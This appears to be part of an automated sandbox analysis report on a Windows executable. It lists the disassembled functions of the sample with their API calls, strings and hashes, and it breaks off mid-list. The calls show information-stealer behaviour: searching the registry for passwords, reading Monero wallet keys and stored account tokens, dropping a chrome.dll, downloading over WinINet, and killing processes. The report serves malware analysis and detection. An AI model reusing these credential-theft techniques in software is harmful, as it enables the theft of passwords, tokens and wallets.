                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: d5abb25285c84a331b7b1b401aa3cc4ee7846ff14bb7fc5309695a1c862d3a91
                                    • Instruction ID: db406bc6e177e92639637b70d7e49b28530cc05ddf5156b23cacdf46306036d9
                                    • Opcode Fuzzy Hash: d5abb25285c84a331b7b1b401aa3cc4ee7846ff14bb7fc5309695a1c862d3a91
                                    • Instruction Fuzzy Hash: DC215EB1E44248AFDB00DFD5CC49FAEB7B8FB48B00F104559F209BB280D77869048BA4
                                    Function 00BD60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                    • InternetOpenA.WININET(00BF0DFB,00000001,00000000,00000000,00000000), ref: 00BD615F
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BD61DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BD6203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00BD622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00BD6299
                                    • InternetCloseHandle.WININET(?), ref: 00BD62A3
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD62B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 0d335d175f6da0814746645ecb06b066dddd23b3ea7ae5313e904313b628f92f
                                    • Instruction ID: 26f009d8211d477df31b075801471849e8132ae77535e6355936faba8387f3b2
                                    • Opcode Fuzzy Hash: 0d335d175f6da0814746645ecb06b066dddd23b3ea7ae5313e904313b628f92f
                                    • Instruction Fuzzy Hash: 5D5143B1A00218AFDB24DFA1CC45BDEB7B9AB44301F1080D9F645B71C1EB75AA89CF95
                                    Function 00C5012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 00C5024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 00C5035B
                                    • CatchIt.LIBVCRUNTIME ref: 00C503AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 00C504C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: ec614265e84960c72dfd0c682527563c81f2bf1a96d0257669c795d55978b7c3
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: D4B1A179C00209DFCF15DFA4C8819AEB7B5FF14312F24415AED21AB212D730DA99DB99
                                    Function 00BD7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BD739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BD7411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BD746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD74B2
                                    • HeapFree.KERNEL32(00000000), ref: 00BD74B9
                                    • task.LIBCPMTD ref: 00BD75B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 717eb82f0112196da2a99d5fa5af77d1a0dae9bfe4e1a4a85609a917c2ff8ba8
                                    • Instruction ID: 5f81f8432b423a1ab5b36e8b7140daed7a4faacab33349f240aff415443ec583
                                    • Opcode Fuzzy Hash: 717eb82f0112196da2a99d5fa5af77d1a0dae9bfe4e1a4a85609a917c2ff8ba8
                                    • Instruction Fuzzy Hash: 87612AB59441689BDB24DB50DC41BD9B7F8FF58304F0081EAE649A6241EFB06BC9CFA1
                                    Function 00BDBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBC6F
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BDBC9D
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBD75
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: b878acd6eeab739a34e00d0bdc191c08182a8b38333bedd8282439b9feffd976
                                    • Instruction ID: 6df394c6bd0e01ab0e4d197b98beb955f639b2e51ca7d3c6b753d27dfa1daa7c
                                    • Opcode Fuzzy Hash: b878acd6eeab739a34e00d0bdc191c08182a8b38333bedd8282439b9feffd976
                                    • Instruction Fuzzy Hash: 2EB14C72910148ABCB14FBB1CDA6EEE77BDAF54300F4145E9F106621A1EF347A48CB62
                                    Function 00BE6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: fba26a4e9d83e448e8bb0501abee537dced8246751933ea4d0fe2fe752f086a0
                                    • Instruction ID: b12fa545835337600d89c30d5a6d016b6c7266d07f4965580c75d468c7698a72
                                    • Opcode Fuzzy Hash: fba26a4e9d83e448e8bb0501abee537dced8246751933ea4d0fe2fe752f086a0
                                    • Instruction Fuzzy Hash: 09F08231E0D249EFD344DFE2EC0975CBBF0EB1A747F1141A6F649A6190CA706A50DB61
                                    Function 00BE08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00BE08DC,C:\ProgramData\chrome.dll), ref: 00BE9871
                                      • Part of subcall function 00BDA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BDA098
                                    • StrCmpCA.SHLWAPI(00000000,018B8F00), ref: 00BE0922
                                    • StrCmpCA.SHLWAPI(00000000,018B9010), ref: 00BE0B79
                                    • StrCmpCA.SHLWAPI(00000000,018B8F10), ref: 00BE0A0C
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BE0C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00BE08CD
                                    • C:\ProgramData\chrome.dll, xrefs: 00BE0C30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 73608517b0c5f913d1fd2194b725c1572f9dc0a32409a0aa5eaa40c4cccf41ee
                                    • Instruction ID: 772c87c50709f00ee3a903c720dea2aa13a06660230c46360aca68557f40100f
                                    • Opcode Fuzzy Hash: 73608517b0c5f913d1fd2194b725c1572f9dc0a32409a0aa5eaa40c4cccf41ee
                                    • Instruction Fuzzy Hash: 60A179717002489FCB28FF65D991AAD77FAEF95300F11856DE40A5F391DB30AA09CB92
                                    Function 00BD9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                    • wsprintfA.USER32 ref: 00BD9E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BD9F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BD9F17
                                    • lstrcat.KERNEL32(00000000,00BF12D8), ref: 00BD9F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00BD9F7C
                                    • Sleep.KERNEL32(00001388), ref: 00BDA013
                                      • Part of subcall function 00BE99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE99C5
                                      • Part of subcall function 00BE99A0: Process32First.KERNEL32(00BDA056,00000128), ref: 00BE99D9
                                      • Part of subcall function 00BE99A0: Process32Next.KERNEL32(00BDA056,00000128), ref: 00BE99F2
                                      • Part of subcall function 00BE99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE9A4E
                                      • Part of subcall function 00BE99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE9A6C
                                      • Part of subcall function 00BE99A0: CloseHandle.KERNEL32(00000000), ref: 00BE9A79
                                      • Part of subcall function 00BE99A0: CloseHandle.KERNEL32(00BDA056), ref: 00BE9A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: ea9c58d87a68d18a4afe97c04287e9ab82652e6ccf701b17c961b5a27fdac4b1
                                    • Instruction ID: 7d3b467e7ae5a48a895fd1ec9155a1f691810803a438e145e483a5cc63b84e80
                                    • Opcode Fuzzy Hash: ea9c58d87a68d18a4afe97c04287e9ab82652e6ccf701b17c961b5a27fdac4b1
                                    • Instruction Fuzzy Hash: D65176B1944318ABEB24DB60DC4AFDE77B8AF44704F0045D8B60DA7291EB75AB88CF51
                                    Function 00C4F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C4FA27
                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C4FADB
                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: f06758064568ae520027c696b28d848270931efc645cb30b6b40019242669b57
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: DB41A434900219EFCF10DF68C885A9E7BB5FF49314F248169ED28AB391D731DA46DB91
                                    Function 00BD5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BD501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD5021
                                    • InternetOpenA.WININET(00BF0DE3,00000000,00000000,00000000,00000000), ref: 00BD503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BD5061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BD5091
                                    • InternetCloseHandle.WININET(?), ref: 00BD5109
                                    • InternetCloseHandle.WININET(?), ref: 00BD5116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
